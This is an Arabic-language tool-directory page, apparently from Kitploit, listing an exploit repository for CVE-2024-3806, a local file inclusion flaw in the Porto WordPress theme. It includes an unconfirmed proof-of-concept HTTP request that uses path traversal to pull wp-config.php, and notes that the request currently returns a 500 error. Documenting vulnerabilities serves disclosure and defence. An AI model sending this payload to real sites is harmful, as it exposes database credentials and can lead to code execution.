Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-3806 — Porto <= 7.1.0 - تضمين ملف محلي غير مصادق عليه عبر porto_ajax_posts | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-3806
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubrandomrobbiebf/cve-2024-3806

CVE-2024-3806

Porto <= 7.1.0 - تضمين ملف محلي غير مصادق عليه عبر porto_ajax_posts

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-3806

Porto <= 7.1.0 - تضمين ملفات محلي غير مصادق عليه عبر porto_ajax_posts

الوصف

ثيم Porto لووردبريس معرض لثغرة تضمين الملفات المحلية (Local File Inclusion) في جميع الإصدارات حتى 7.1.0 بما فيها، وذلك عبر دالة 'porto_ajax_posts'. وهذا يتيح للمهاجمين غير المصادقين تضمين وتنفيذ ملفات عشوائية على الخادم، مما يسمح بتنفيذ أي كود PHP في تلك الملفات. يمكن استخدام هذا لتجاوز ضوابط الوصول، أو الحصول على بيانات حساسة، أو تحقيق تنفيذ كود في الحالات التي يمكن فيها رفع وتضمين ملفات من نوع php.

POC غير مؤكد

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}

ملاحظات

الحصول على خطأ 500 في الوقت الحالي.

تنزيل الأداة